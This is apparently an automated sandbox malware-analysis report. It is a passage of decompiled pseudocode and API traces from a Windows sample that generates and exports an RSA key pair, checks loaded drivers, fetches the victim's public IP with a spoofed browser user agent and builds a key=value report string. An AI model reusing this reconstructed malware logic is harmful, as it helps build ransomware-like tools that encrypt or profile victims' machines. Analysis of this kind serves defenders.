                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                    • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                    • API String ID: 3996966626-2152921537
                                    • Opcode ID: 68a0b4c260ffe8112be6ec6c0bb84235ce743d8660b6c49ab48a55fdb86692f8
                                    • Instruction ID: 24720a91cf389dc5134221f566be7856e50987b67b8a77abf5a85cc074c744cc
                                    • Opcode Fuzzy Hash: 68a0b4c260ffe8112be6ec6c0bb84235ce743d8660b6c49ab48a55fdb86692f8
                                    • Instruction Fuzzy Hash: 48312874A40209ABDB208FE5DC45BEEBB78FF84721F144029E501A6281E775FA25CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E0F148400(intOrPtr __ecx, intOrPtr __edx) {
                                    				long* _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				char _v32;
                                    				char _v34;
                                    				short _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				char _v48;
                                    				long** _t25;
                                    				void* _t28;
                                    				struct HINSTANCE__* _t33;
                                    				_Unknown_base(*)()* _t34;
                                    				long _t40;
                                    				void* _t42;
                                    				void* _t46;
                                    				void* _t47;
                                    				void* _t48;
                                    
                                    				_t46 = 0;
                                    				_v16 = __ecx;
                                    				_t25 =  &_v8;
                                    				_v12 = __edx;
                                    				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000); // executed
                                    				if(_t25 == 0) {
                                    					L10:
                                    					return _t46;
                                    				} else {
                                    					_t42 = 0;
                                    					do {
                                    						_t4 = _t42 + 0x61; // 0x61
                                    						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
                                    						_t42 = _t42 + 1;
                                    					} while (_t42 < 0x1a);
                                    					_t40 = __edx + 1;
                                    					_t28 = VirtualAlloc(0, _t40, 0x3000, 0x40); // executed
                                    					_t47 = _t28;
                                    					if(_t47 == 0 || _v12 >= _t40) {
                                    						CryptReleaseContext(_v8, 0);
                                    						VirtualFree(_t47, 0, 0x8000);
                                    						return 0;
                                    					} else {
                                    						_v48 = 0x70797243;
                                    						_v44 = 0x6e654774;
                                    						_v40 = 0x646e6152;
                                    						_v36 = 0x6d6f;
                                    						_v34 = 0;
                                    						_v32 = 0x61766441;
                                    						_v28 = 0x32336970;
                                    						_v24 = 0x6c6c642e;
                                    						_v20 = 0;
                                    						_t33 = GetModuleHandleA( &_v32);
                                    						if(_t33 != 0) {
                                    							L7:
                                    							_t19 =  &_v48; // 0x70797243
                                    							_t34 = GetProcAddress(_t33, _t19);
                                    							if(_t34 != 0) {
                                    								 *_t34(_v8, _v12, _v16);
                                    								_t46 =  !=  ? 1 : _t46;
                                    							}
                                    						} else {
                                    							_t18 =  &_v32; // 0x61766441
                                    							_t33 = LoadLibraryA(_t18);
                                    							if(_t33 != 0) {
                                    								goto L7;
                                    							}
                                    						}
                                    						CryptReleaseContext(_v8, 0);
                                    						VirtualFree(_t47, 0, 0x8000); // executed
                                    						goto L10;
                                    					}
                                    				}
                                    			}
























                                    0x0f148410
                                    0x0f148412
                                    0x0f148417
                                    0x0f14841d
                                    0x0f148420
                                    0x0f148428
                                    0x0f1484f2
                                    0x0f1484fa
                                    0x0f14842e
                                    0x0f14842e
                                    0x0f148430
                                    0x0f148430
                                    0x0f148433
                                    0x0f148437
                                    0x0f148438
                                    0x0f148444
                                    0x0f148448
                                    0x0f14844e
                                    0x0f148452
                                    0x0f148500
                                    0x0f14850e
                                    0x0f14851c
                                    0x0f148461
                                    0x0f148464
                                    0x0f14846c
                                    0x0f148473
                                    0x0f14847a
                                    0x0f148480
                                    0x0f148484
                                    0x0f14848b
                                    0x0f148492
                                    0x0f148499
                                    0x0f14849d
                                    0x0f1484a5
                                    0x0f1484b5
                                    0x0f1484b5
                                    0x0f1484ba
                                    0x0f1484c2
                                    0x0f1484cd
                                    0x0f1484d6
                                    0x0f1484d6
                                    0x0f1484a7
                                    0x0f1484a7
                                    0x0f1484ab
                                    0x0f1484b3
                                    0x00000000
                                    0x00000000
                                    0x0f1484b3
                                    0x0f1484de
                                    0x0f1484ec
                                    0x00000000
                                    0x0f1484ec
                                    0x0f148452

                                    APIs
                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,772966A0,00000000), ref: 0F148420
                                    • VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 0F148448
                                    • GetModuleHandleA.KERNEL32(?), ref: 0F14849D
                                    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F1484AB
                                    • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F1484BA
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1484DE
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1484EC
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F143875), ref: 0F148500
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F143875), ref: 0F14850E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                    • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                    • API String ID: 3996966626-2152921537
                                    • Opcode ID: 1ccb4957c961c58e3e50a4b8d35658860d0ebd67b2c6c0391e52695f8370b892
                                    • Instruction ID: 361492867c70e9f71b42b36f01fc84e96629479dba1268a3b555dce683df4810
                                    • Opcode Fuzzy Hash: 1ccb4957c961c58e3e50a4b8d35658860d0ebd67b2c6c0391e52695f8370b892
                                    • Instruction Fuzzy Hash: 1A31E475A40208AFDB10CFE5DC49BEEBBB8EF84712F104069F601E2181D779AA148B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 16%
                                    			E0F1463E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                    				long* _v8;
                                    				long* _v12;
                                    				int _v16;
                                    				long** _t15;
                                    				long* _t16;
                                    				long _t23;
                                    
                                    				_t15 =  &_v8;
                                    				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000); // executed
                                    				if(_t15 != 0) {
                                    					L6:
                                    					_t16 = _v8;
                                    					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
                                    					if(_t16 == 0) {
                                    					}
                                    					_v16 = 0;
                                    					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
                                    					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
                                    					CryptDestroyKey(_v12);
                                    					CryptReleaseContext(_v8, 0);
                                    					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
                                    					return 1;
                                    				}
                                    				_t23 = GetLastError();
                                    				if(_t23 != 0x80090016) {
                                    					return 0;
                                    				}
                                    				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                    				if(_t23 != 0) {
                                    					goto L6;
                                    				}
                                    				return 0;
                                    			}









                                    0x0f1463f4
                                    0x0f1463f8
                                    0x0f146400
                                    0x0f146438
                                    0x0f146446
                                    0x0f14644a
                                    0x0f146452
                                    0x0f146452
                                    0x0f146455
                                    0x0f14646e
                                    0x0f146486
                                    0x0f146490
                                    0x0f14649c
                                    0x0f1464b1
                                    0x00000000
                                    0x0f1464b7
                                    0x0f146402
                                    0x0f14640d
                                    0x00000000
                                    0x0f146431
                                    0x0f14641e
                                    0x0f146426
                                    0x00000000
                                    0x0f14642f
                                    0x00000000

                                    APIs
                                    • CryptAcquireContextW.ADVAPI32(0F144B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0F144B96,?,0F144B9E), ref: 0F1463F8
                                    • GetLastError.KERNEL32(?,0F144B9E), ref: 0F146402
                                    • CryptAcquireContextW.ADVAPI32(0F144B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F144B9E), ref: 0F14641E
                                    • CryptGenKey.ADVAPI32(0F144B9E,0000A400,08000001,?,?,0F144B9E), ref: 0F14644A
                                    • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0F14646E
                                    • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0F146486
                                    • CryptDestroyKey.ADVAPI32(?), ref: 0F146490
                                    • CryptReleaseContext.ADVAPI32(0F144B9E,00000000), ref: 0F14649C
                                    • CryptAcquireContextW.ADVAPI32(0F144B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0F1464B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
                                    • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                    • API String ID: 137402220-1948191093
                                    • Opcode ID: 35157004f6a2ce43f14be03d322c0763115aedbe68c740ac715c88dca9a8d3e5
                                    • Instruction ID: 32f2803a12e5098c24370db216d6e2958018c884f58f457de0bab4b5b94fbf06
                                    • Opcode Fuzzy Hash: 35157004f6a2ce43f14be03d322c0763115aedbe68c740ac715c88dca9a8d3e5
                                    • Instruction Fuzzy Hash: FF214179780305BBEB20CFA0DD4AF9A7779AB88B15F504404F701AB1C0D7BAB5A49B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 46%
                                    			E0F142F50(WCHAR* __ecx) {
                                    				unsigned int _v8;
                                    				char _v12;
                                    				WCHAR* _v16;
                                    				short _v2064;
                                    				long _t17;
                                    				void* _t18;
                                    				void* _t20;
                                    				WCHAR* _t23;
                                    				int _t25;
                                    				void* _t28;
                                    				unsigned int _t31;
                                    				void* _t35;
                                    				intOrPtr* _t39;
                                    				signed int _t40;
                                    
                                    				_t39 = __imp__EnumDeviceDrivers;
                                    				_v16 = __ecx;
                                    				_v8 = 0;
                                    				 *_t39( &_v12, 4,  &_v8); // executed
                                    				_t17 = _v8;
                                    				if(_t17 != 0) {
                                    					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
                                    					_t35 = _t18;
                                    					if(_t35 != 0) {
                                    						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
                                    						if(_t20 == 0) {
                                    							L10:
                                    							VirtualFree(_t35, 0, 0x8000); // executed
                                    							return 0;
                                    						} else {
                                    							_t40 = 0;
                                    							_t31 = _v8 >> 2;
                                    							if(_t31 > 0) {
                                    								do {
                                    									_t23 =  &_v2064;
                                    									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
                                    									if(_t23 == 0) {
                                    										goto L9;
                                    									} else {
                                    										_t25 = lstrcmpiW( &_v2064, _v16); // executed
                                    										if(_t25 == 0) {
                                    											VirtualFree(_t35, 0, 0x8000);
                                    											return 1;
                                    										} else {
                                    											goto L9;
                                    										}
                                    									}
                                    									goto L12;
                                    									L9:
                                    									_t40 = _t40 + 1;
                                    								} while (_t40 < _t31);
                                    							}
                                    							goto L10;
                                    						}
                                    					} else {
                                    						return _t18;
                                    					}
                                    				} else {
                                    					return _t17;
                                    				}
                                    				L12:
                                    			}

















                                    0x0f142f5a
                                    0x0f142f69
                                    0x0f142f6d
                                    0x0f142f74
                                    0x0f142f76
                                    0x0f142f7b
                                    0x0f142f8d
                                    0x0f142f93
                                    0x0f142f97
                                    0x0f142fa8
                                    0x0f142fac
                                    0x0f142ff2
                                    0x0f142ffa
                                    0x0f143008
                                    0x0f142fae
                                    0x0f142fb1
                                    0x0f142fb3
                                    0x0f142fb8
                                    0x0f142fc0
                                    0x0f142fc5
                                    0x0f142fcf
                                    0x0f142fd7
                                    0x00000000
                                    0x0f142fd9
                                    0x0f142fe3
                                    0x0f142feb
                                    0x0f143011
                                    0x0f143022
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f142feb
                                    0x00000000
                                    0x0f142fed
                                    0x0f142fed
                                    0x0f142fee
                                    0x0f142fc0
                                    0x00000000
                                    0x0f142fb8
                                    0x0f142f99
                                    0x0f142f9e
                                    0x0f142f9e
                                    0x0f142f81
                                    0x0f142f81
                                    0x0f142f81
                                    0x00000000

                                    APIs
                                    • K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F142F74
                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F142F8D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocDeviceDriversEnumVirtual
                                    • String ID: i)w
                                    • API String ID: 4140748134-1280834553
                                    • Opcode ID: 2fccd09ffb9a21c52927ac2692f26f22def1d12a6fc7d31e0b9e38cc4dd609bb
                                    • Instruction ID: f1b2403d6271fb5be028693a9ad1733308792222de558b8054ca6f59f5387cab
                                    • Opcode Fuzzy Hash: 2fccd09ffb9a21c52927ac2692f26f22def1d12a6fc7d31e0b9e38cc4dd609bb
                                    • Instruction Fuzzy Hash: 81212C36B44218BBEB108E98DC41FEDB7BCEF84711F4001A6FE04D6180DB74B9659B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0F147E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F148024
                                      • Part of subcall function 0F147E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F14803D
                                    • VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,772966A0,?), ref: 0F14700F
                                    • lstrlenW.KERNEL32(0F14FF8C), ref: 0F14701C
                                      • Part of subcall function 0F148050: InternetCloseHandle.WININET(?), ref: 0F148063
                                      • Part of subcall function 0F148050: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F148082
                                    • lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0F14FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F14704B
                                    • wsprintfW.USER32 ref: 0F147063
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0F14FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F147079
                                    • InternetCloseHandle.WININET(?), ref: 0F147087
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
                                    • String ID: GET$ipv4bot.whatismyipaddress.com
                                    • API String ID: 4289327240-2259699238
                                    • Opcode ID: 48a8a72b010258eab4589126aed81f1e073fea08bcc61858990e584651263144
                                    • Instruction ID: 7597b9d3fd40e6b675767185d2d8d230c9b372c8d0d3bfbd35e0560b0c79234a
                                    • Opcode Fuzzy Hash: 48a8a72b010258eab4589126aed81f1e073fea08bcc61858990e584651263144
                                    • Instruction Fuzzy Hash: 250152397812007BD7206E659C4EF9B3A28AFC6B22F010024FA05E31C1DB69B57AC6A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 169 f147e40-f14802b InternetOpenW 170 f148042-f148048 169->170 171 f14802d-f14803f InternetOpenW 169->171 171->170
                                    C-Code - Quality: 100%
                                    			E0F147E40(void* __ecx) {
                                    				short _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				intOrPtr _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				intOrPtr _v100;
                                    				intOrPtr _v104;
                                    				intOrPtr _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				intOrPtr _v120;
                                    				intOrPtr _v124;
                                    				intOrPtr _v128;
                                    				intOrPtr _v132;
                                    				intOrPtr _v136;
                                    				intOrPtr _v140;
                                    				intOrPtr _v144;
                                    				intOrPtr _v148;
                                    				intOrPtr _v152;
                                    				intOrPtr _v156;
                                    				intOrPtr _v160;
                                    				intOrPtr _v164;
                                    				intOrPtr _v168;
                                    				intOrPtr _v172;
                                    				intOrPtr _v176;
                                    				intOrPtr _v180;
                                    				intOrPtr _v184;
                                    				intOrPtr _v188;
                                    				intOrPtr _v192;
                                    				intOrPtr _v196;
                                    				intOrPtr _v200;
                                    				intOrPtr _v204;
                                    				intOrPtr _v208;
                                    				intOrPtr _v212;
                                    				intOrPtr _v216;
                                    				intOrPtr _v220;
                                    				short _v224;
                                    				WCHAR* _t62;
                                    				void* _t64;
                                    
                                    				_v8 = 0;
                                    				_v224 = 0x6f004d;
                                    				_v220 = 0x69007a;
                                    				_v216 = 0x6c006c;
                                    				_v212 = 0x2f0061;
                                    				_v208 = 0x2e0035;
                                    				_v204 = 0x200030;
                                    				_v200 = 0x570028;
                                    				_v196 = 0x6e0069;
                                    				_v192 = 0x6f0064;
                                    				_v188 = 0x730077;
                                    				_v184 = 0x4e0020;
                                    				_v180 = 0x200054;
                                    				_v176 = 0x2e0036;
                                    				_v172 = 0x3b0031;
                                    				_v168 = 0x570020;
                                    				_v164 = 0x57004f;
                                    				_v160 = 0x340036;
                                    				_v156 = 0x200029;
                                    				_v152 = 0x700041;
                                    				_v148 = 0x6c0070;
                                    				_v144 = 0x570065;
                                    				_v140 = 0x620065;
                                    				_v136 = 0x69004b;
                                    				_v132 = 0x2f0074;
                                    				_v128 = 0x330035;
                                    				_v124 = 0x2e0037;
                                    				_v120 = 0x360033;
                                    				_v116 = 0x280020;
                                    				_v112 = 0x48004b;
                                    				_v108 = 0x4d0054;
                                    				_v104 = 0x2c004c;
                                    				_v100 = 0x6c0020;
                                    				_v96 = 0x6b0069;
                                    				_v92 = 0x200065;
                                    				_v88 = 0x650047;
                                    				_v84 = 0x6b0063;
                                    				_v80 = 0x29006f;
                                    				_v76 = 0x430020;
                                    				_v72 = 0x720068;
                                    				_v68 = 0x6d006f;
                                    				_v64 = 0x2f0065;
                                    				_v60 = 0x350035;
                                    				_v56 = 0x30002e;
                                    				_v52 = 0x32002e;
                                    				_v48 = 0x380038;
                                    				_v44 = 0x2e0033;
                                    				_v40 = 0x370038;
                                    				_v36 = 0x530020;
                                    				_v32 = 0x660061;
                                    				_v28 = 0x720061;
                                    				_v24 = 0x2f0069;
                                    				_v20 = 0x330035;
                                    				_v16 = 0x2e0037;
                                    				_v12 = 0x360033;
                                    				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
                                    				 *(__ecx + 4) = _t62;
                                    				if(_t62 == 0) {
                                    					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
                                    					 *(__ecx + 4) = _t64;
                                    					return _t64;
                                    				}
                                    				return _t62;
                                    			}




























































                                    0x0f147e58
                                    0x0f147e64
                                    0x0f147e6f
                                    0x0f147e79
                                    0x0f147e83
                                    0x0f147e8d
                                    0x0f147e97
                                    0x0f147ea1
                                    0x0f147eab
                                    0x0f147eb5
                                    0x0f147ebf
                                    0x0f147ec9
                                    0x0f147ed3
                                    0x0f147edd
                                    0x0f147ee7
                                    0x0f147ef1
                                    0x0f147efb
                                    0x0f147f05
                                    0x0f147f0f
                                    0x0f147f19
                                    0x0f147f23
                                    0x0f147f2d
                                    0x0f147f37
                                    0x0f147f41
                                    0x0f147f4b
                                    0x0f147f52
                                    0x0f147f59
                                    0x0f147f60
                                    0x0f147f67
                                    0x0f147f6e
                                    0x0f147f75
                                    0x0f147f7c
                                    0x0f147f83
                                    0x0f147f8a
                                    0x0f147f91
                                    0x0f147f98
                                    0x0f147f9f
                                    0x0f147fa6
                                    0x0f147fad
                                    0x0f147fb4
                                    0x0f147fbb
                                    0x0f147fc2
                                    0x0f147fc9
                                    0x0f147fd0
                                    0x0f147fd7
                                    0x0f147fde
                                    0x0f147fe5
                                    0x0f147fec
                                    0x0f147ff3
                                    0x0f147ffa
                                    0x0f148001
                                    0x0f148008
                                    0x0f14800f
                                    0x0f148016
                                    0x0f14801d
                                    0x0f148024
                                    0x0f148026
                                    0x0f14802b
                                    0x0f14803d
                                    0x0f14803f
                                    0x00000000
                                    0x0f14803f
                                    0x0f148048

                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F148024
                                    • InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F14803D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InternetOpen
                                    • String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
                                    • API String ID: 2038078732-2805935662
                                    • Opcode ID: 33d3080af4ce2883dc5ed71013121399c7f91fdd643f2a4e664ca12b2b26e0c4
                                    • Instruction ID: 82c453c82b563c6a6d50288502b4e44da338af78819e7b833011b23e673d3d40
                                    • Opcode Fuzzy Hash: 33d3080af4ce2883dc5ed71013121399c7f91fdd643f2a4e664ca12b2b26e0c4
                                    • Instruction Fuzzy Hash: 2941A8B4811358DEEB25CF91999879EBFF5BB04748F50819ED5086B201C7F60A89CF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 172 f1470a0-f1470b8 173 f1470dc-f1470df 172->173 174 f1470ba-f1470da lstrcatW * 4 172->174 175 f1470e1-f1470fb lstrcatW * 4 173->175 176 f1470fd-f147101 173->176 174->173 175->176 177 f147103-f14711d lstrcatW * 4 176->177 178 f14711f-f147123 176->178 177->178 179 f147125-f14713f lstrcatW * 4 178->179 180 f147141-f147145 178->180 179->180 181 f147147-f147161 lstrcatW * 4 180->181 182 f147163-f147167 180->182 181->182 183 f147185-f147189 182->183 184 f147169-f147183 lstrcatW * 4 182->184 185 f1471a7-f1471ab 183->185 186 f14718b-f1471a5 lstrcatW * 4 183->186 184->183 187 f1471ad-f1471c7 lstrcatW * 4 185->187 188 f1471c9-f1471cd 185->188 186->185 187->188 189 f1471cf-f1471e9 lstrcatW * 4 188->189 190 f1471eb-f1471ef 188->190 189->190 191 f1471f1-f14720a VirtualAlloc 190->191 192 f14725c-f147260 190->192 193 f147221-f14722d wsprintfW 191->193 194 f14720c-f14721f wsprintfW 191->194 195 f147262-f14727c lstrcatW * 4 192->195 196 f14727e-f147292 lstrlenW 192->196 197 f147230-f147256 lstrcatW * 4 VirtualFree 193->197 194->197 195->196 197->192
                                    C-Code - Quality: 100%
                                    			E0F1470A0(intOrPtr* __ecx, WCHAR* _a4) {
                                    				WCHAR* _t47;
                                    				intOrPtr* _t91;
                                    				intOrPtr _t94;
                                    				WCHAR* _t96;
                                    
                                    				_t91 = __ecx;
                                    				_t96 = _a4;
                                    				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
                                    					lstrcatW(_t96,  *(__ecx + 0x88));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x84));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *_t91 != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 4));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 8));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x10));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x14));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x1c));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x20));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x28));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x2c));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x34));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x38));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x40));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x44));
                                    					lstrcatW(_t96, "&");
                                    				}
                                    				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
                                    					lstrcatW(_t96,  *(_t91 + 0x4c));
                                    					lstrcatW(_t96, "=");
                                    					lstrcatW(_t96,  *(_t91 + 0x50));
                                    					lstrcatW(_t96, "&");
                                    				}
